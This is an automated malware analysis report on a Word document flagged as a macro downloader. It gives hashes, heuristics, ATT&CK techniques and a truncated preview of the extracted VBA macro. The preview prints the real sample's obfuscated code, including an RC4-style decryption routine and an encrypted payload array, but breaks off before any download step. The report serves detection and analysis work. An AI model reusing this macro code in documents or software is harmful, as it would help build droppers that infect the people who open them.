Office (OLE) malware analysis — malicious · baf6604e9adf4a52

MALICIOUS

Office (OLE)

222.5 KB Created: 2016-02-08 19:57:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: f827cecd4646c0c5c124cfdcf9ec4ef4 SHA-1: acf8c78bbef20774a6f5c355148969302ff9571b SHA-256: baf6604e9adf4a5296c92080fd9fc2bb730021258a71036cf3933656b16b1d99

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing a VBA macro. The macro is configured to execute automatically upon opening the document (Document_Open macro). This macro utilizes the Shell() function, a critical heuristic firing, indicating it likely downloads and executes a second-stage payload. The ClamAV detection as 'Doc.Downloader.Donoff-9761296-0' further supports this downloader functionality.

Heuristics 6

ClamAV: Doc.Downloader.Donoff-9761296-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Donoff-9761296-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 80690 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	80690 bytes
SHA-256: `8fc6b137178525c5d50d6fc5e9070d34373f82de5fe276bf8dcde78c83fbe01d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim AgdFDKavwbfX9KZ(1879) As Long Function KBu(UElVwbshQ1Y As Integer) As Boolean DRDo3mB9q = Day(Now) Static Jcs1u As Byte RaLkP0weuihoXcIP = Day(Now) Jcs1u = Jcs1u + 1 RGla3pHotOff = Day(Now) If Jcs1u = 1 Then Debug.Assert Not KBu(25) Y1YrLrN9Y89C = Day(Now) KBu = Jcs1u = 0 Yj3EknPrhbl5 = Day(Now) Jcs1u = 0 XLQaI5K0S = Day(Now) End Function Function ASe6jGF6nrL(YncUSnPH, XsKc9BPHg) Bxsy09NSrtAFXSupS = Day(Now) ASe6jGF6nrL = (YncUSnPH And Not XsKc9BPHg) Or (Not YncUSnPH And XsKc9BPHg) CQBGEBfc6 = Day(Now) End Function Function zC(ByVal Character As Integer) As String Dim bArr(1) As Byte, Byte1 As Byte, Byte2 As Byte, i As Long If Character < 0 Then Exit Function If Character > (64 + 805 + 64 - 805 + 64 + 805 + 64 - 805 - 1) Then Byte1 = Character Mod (64 + 236 + 64 - 236 + 64 + 236 + 64 - 236) Byte2 = CInt(Character / (64 + 446 + 64 - 446 + 64 + 446 + 64 - 446)) Else Byte1 = Character Byte2 = 0 End If bArr(0) = Byte1 bArr(1) = Byte2 zC = bArr End Function Function JI342KnsvL5m9A(G2xqfPYBG4() As Byte, HZ1cBqyR5wAamk() As Byte) As String On Error Resume Next Dim VaN6Br0FCHk(0 To 255) As Integer, Ecz5o As Long, U95aKouw4yd2PU As Long, HftHRe2a As Long, HAqIHDTO As Byte, RZ9mrbbv() As Byte, Be8aUB() As Byte ReDim RZ9mrbbv(YWtuS(G2xqfPYBG4)) As Byte RZ9mrbbv = G2xqfPYBG4 ReDim Be8aUB(YWtuS(HZ1cBqyR5wAamk)) As Byte Be8aUB = HZ1cBqyR5wAamk For Ecz5o = 0 To (64 + 535 + 64 - 535 + 64 + 535 + 64 - 535 - 1) VaN6Br0FCHk(Ecz5o) = Ecz5o Next Ecz5o Ecz5o = 0 U95aKouw4yd2PU = 0 HftHRe2a = 0 For Ecz5o = 0 To (64 + 403 + 64 - 403 + 64 + 403 + 64 - 403 - 1) U95aKouw4yd2PU = (U95aKouw4yd2PU + VaN6Br0FCHk(Ecz5o) + Be8aUB(Ecz5o Mod (YWtuS(HZ1cBqyR5wAamk) + 1))) Mod ((64 + 151 + 64 - 151 + 64 + 151 + 64 - 151)) HAqIHDTO = VaN6Br0FCHk(Ecz5o) VaN6Br0FCHk(Ecz5o) = VaN6Br0FCHk(U95aKouw4yd2PU) VaN6Br0FCHk(U95aKouw4yd2PU) = HAqIHDTO Next Ecz5o Ecz5o = 0 U95aKouw4yd2PU = 0 HftHRe2a = 0 For Ecz5o = 0 To YWtuS(G2xqfPYBG4) U95aKouw4yd2PU = (U95aKouw4yd2PU + 1) Mod (64 + 677 + 64 - 677 + 64 + 677 + 64 - 677) HftHRe2a = (HftHRe2a + VaN6Br0FCHk(U95aKouw4yd2PU)) Mod (64 + 83 + 64 - 83 + 64 + 83 + 64 - 83) HAqIHDTO = VaN6Br0FCHk(U95aKouw4yd2PU) VaN6Br0FCHk(U95aKouw4yd2PU) = VaN6Br0FCHk(HftHRe2a) VaN6Br0FCHk(HftHRe2a) = HAqIHDTO RZ9mrbbv(Ecz5o) = ASe6jGF6nrL(RZ9mrbbv(Ecz5o), (VaN6Br0FCHk((VaN6Br0FCHk(U95aKouw4yd2PU) + VaN6Br0FCHk(HftHRe2a)) Mod ((64 + 2 + 64 - 2 + 64 + 2 + 64 - 2))))) Next Ecz5o JI342KnsvL5m9A = zTo(RZ9mrbbv) End Function Function zNumber(FrmbW1Ww3 As Long, OjCP As Long) As Byte Dim F7 As Long, Ef3I2PixLj As Long For F7 = 48 To 57 If Mid(FrmbW1Ww3, OjCP, 1) = Ef3I2PixLj Then zNumber = F7: Exit For Ef3I2PixLj = Ef3I2PixLj + 1 Next F7 End Function Sub Jgg3xYaxe7UwHne9() AgdFDKavwbfX9KZ(0) = -1730197290 AgdFDKavwbfX9KZ(1) = 857685275 AgdFDKavwbfX9KZ(2) = -790615301 AgdFDKavwbfX9KZ(3) = 220179311 AgdFDKavwbfX9KZ(4) = 2135858122 AgdFDKavwbfX9KZ(5) = -243286572 AgdFDKavwbfX9KZ(6) = 1747253670 AgdFDKavwbfX9KZ(7) = 349895457 AgdFDKavwbfX9KZ(8) = 626958067 AgdFDKavwbfX9KZ(9) = 1067118685 AgdFDKavwbfX9KZ(10) = 1628333412 AgdFDKavwbfX9KZ(11) = 605807207 AgdFDKavwbfX9KZ(12) = 910627020 AgdFDKavwbfX9KZ(13) = 534570972 AgdFDKavwbfX9KZ(14) = -1447703900 AgdFDKavwbfX9KZ(15) = 1935664191 AgdFDKavwbfX9KZ(16) = -744573189 AgdFDKavwbfX9KZ(17) = -707658018 AgdFDKavwbfX9KZ(18) = 191062286 AgdFDKavwbfX9KZ(19) = 540647400 AgdFDKavwbfX9KZ(20) = -935892863 AgdFDKavwbfX9KZ(21) = 88368138 AgdFDKavwbfX9KZ(22) = -1394761355 AgdFDKavwbfX9KZ(23) = 2121572917 AgdFDKavwbfX9KZ(24) = 1044676128 AgdFDKavwbfX9KZ(25) = 1726800548 AgdFDKavwbfX9KZ(26) = 775913805 AgdFDKavwbfX9KZ(27) = -1350155024 AgdFDKavwbfX9KZ(28) = -1483251356 AgdFDKavwbfX9KZ(29) = -337037321 AgdFDKavwbfX9KZ(30) = -1099980950 Ag ... (truncated)

SHA-256: 8fc6b137178525c5d50d6fc5e9070d34373f82de5fe276bf8dcde78c83fbe01d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim AgdFDKavwbfX9KZ(1879) As Long
Function KBu(UElVwbshQ1Y As Integer) As Boolean
DRDo3mB9q = Day(Now)
Static Jcs1u As Byte
RaLkP0weuihoXcIP = Day(Now)
Jcs1u = Jcs1u + 1
RGla3pHotOff = Day(Now)
If Jcs1u = 1 Then Debug.Assert Not KBu(25)
Y1YrLrN9Y89C = Day(Now)
KBu = Jcs1u = 0
Yj3EknPrhbl5 = Day(Now)
Jcs1u = 0
XLQaI5K0S = Day(Now)
End Function
Function ASe6jGF6nrL(YncUSnPH, XsKc9BPHg)
Bxsy09NSrtAFXSupS = Day(Now)
ASe6jGF6nrL = (YncUSnPH And Not XsKc9BPHg) Or (Not YncUSnPH And XsKc9BPHg)
CQBGEBfc6 = Day(Now)
End Function
Function zC(ByVal Character As Integer) As String
Dim bArr(1) As Byte, Byte1  As Byte, Byte2  As Byte, i As Long
If Character < 0 Then Exit Function
If Character > (64 + 805 + 64 - 805 + 64 + 805 + 64 - 805 - 1) Then
Byte1 = Character Mod (64 + 236 + 64 - 236 + 64 + 236 + 64 - 236)
Byte2 = CInt(Character / (64 + 446 + 64 - 446 + 64 + 446 + 64 - 446))
Else
Byte1 = Character
Byte2 = 0
End If
bArr(0) = Byte1
bArr(1) = Byte2
zC = bArr
End Function
Function JI342KnsvL5m9A(G2xqfPYBG4() As Byte, HZ1cBqyR5wAamk() As Byte) As String
On Error Resume Next
Dim VaN6Br0FCHk(0 To 255) As Integer, Ecz5o As Long, U95aKouw4yd2PU As Long, HftHRe2a As Long, HAqIHDTO As Byte, RZ9mrbbv() As Byte, Be8aUB() As Byte
ReDim RZ9mrbbv(YWtuS(G2xqfPYBG4)) As Byte
RZ9mrbbv = G2xqfPYBG4
ReDim Be8aUB(YWtuS(HZ1cBqyR5wAamk)) As Byte
Be8aUB = HZ1cBqyR5wAamk
For Ecz5o = 0 To (64 + 535 + 64 - 535 + 64 + 535 + 64 - 535 - 1)
VaN6Br0FCHk(Ecz5o) = Ecz5o
Next Ecz5o
Ecz5o = 0
U95aKouw4yd2PU = 0
HftHRe2a = 0
For Ecz5o = 0 To (64 + 403 + 64 - 403 + 64 + 403 + 64 - 403 - 1)
U95aKouw4yd2PU = (U95aKouw4yd2PU + VaN6Br0FCHk(Ecz5o) + Be8aUB(Ecz5o Mod (YWtuS(HZ1cBqyR5wAamk) + 1))) Mod ((64 + 151 + 64 - 151 + 64 + 151 + 64 - 151))
HAqIHDTO = VaN6Br0FCHk(Ecz5o)
VaN6Br0FCHk(Ecz5o) = VaN6Br0FCHk(U95aKouw4yd2PU)
VaN6Br0FCHk(U95aKouw4yd2PU) = HAqIHDTO
Next Ecz5o
Ecz5o = 0
U95aKouw4yd2PU = 0
HftHRe2a = 0
For Ecz5o = 0 To YWtuS(G2xqfPYBG4)
U95aKouw4yd2PU = (U95aKouw4yd2PU + 1) Mod (64 + 677 + 64 - 677 + 64 + 677 + 64 - 677)
HftHRe2a = (HftHRe2a + VaN6Br0FCHk(U95aKouw4yd2PU)) Mod (64 + 83 + 64 - 83 + 64 + 83 + 64 - 83)
HAqIHDTO = VaN6Br0FCHk(U95aKouw4yd2PU)
VaN6Br0FCHk(U95aKouw4yd2PU) = VaN6Br0FCHk(HftHRe2a)
VaN6Br0FCHk(HftHRe2a) = HAqIHDTO
RZ9mrbbv(Ecz5o) = ASe6jGF6nrL(RZ9mrbbv(Ecz5o), (VaN6Br0FCHk((VaN6Br0FCHk(U95aKouw4yd2PU) + VaN6Br0FCHk(HftHRe2a)) Mod ((64 + 2 + 64 - 2 + 64 + 2 + 64 - 2)))))
Next Ecz5o
JI342KnsvL5m9A = zTo(RZ9mrbbv)
End Function
Function zNumber(FrmbW1Ww3 As Long, OjCP As Long) As Byte
Dim F7 As Long, Ef3I2PixLj As Long
For F7 = 48 To 57
If Mid(FrmbW1Ww3, OjCP, 1) = Ef3I2PixLj Then zNumber = F7: Exit For
Ef3I2PixLj = Ef3I2PixLj + 1
Next F7
End Function
Sub Jgg3xYaxe7UwHne9()
AgdFDKavwbfX9KZ(0) = -1730197290
AgdFDKavwbfX9KZ(1) = 857685275
AgdFDKavwbfX9KZ(2) = -790615301
AgdFDKavwbfX9KZ(3) = 220179311
AgdFDKavwbfX9KZ(4) = 2135858122
AgdFDKavwbfX9KZ(5) = -243286572
AgdFDKavwbfX9KZ(6) = 1747253670
AgdFDKavwbfX9KZ(7) = 349895457
AgdFDKavwbfX9KZ(8) = 626958067
AgdFDKavwbfX9KZ(9) = 1067118685
AgdFDKavwbfX9KZ(10) = 1628333412
AgdFDKavwbfX9KZ(11) = 605807207
AgdFDKavwbfX9KZ(12) = 910627020
AgdFDKavwbfX9KZ(13) = 534570972
AgdFDKavwbfX9KZ(14) = -1447703900
AgdFDKavwbfX9KZ(15) = 1935664191
AgdFDKavwbfX9KZ(16) = -744573189
AgdFDKavwbfX9KZ(17) = -707658018
AgdFDKavwbfX9KZ(18) = 191062286
AgdFDKavwbfX9KZ(19) = 540647400
AgdFDKavwbfX9KZ(20) = -935892863
AgdFDKavwbfX9KZ(21) = 88368138
AgdFDKavwbfX9KZ(22) = -1394761355
AgdFDKavwbfX9KZ(23) = 2121572917
AgdFDKavwbfX9KZ(24) = 1044676128
AgdFDKavwbfX9KZ(25) = 1726800548
AgdFDKavwbfX9KZ(26) = 775913805
AgdFDKavwbfX9KZ(27) = -1350155024
AgdFDKavwbfX9KZ(28) = -1483251356
AgdFDKavwbfX9KZ(29) = -337037321
AgdFDKavwbfX9KZ(30) = -1099980950
Ag
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.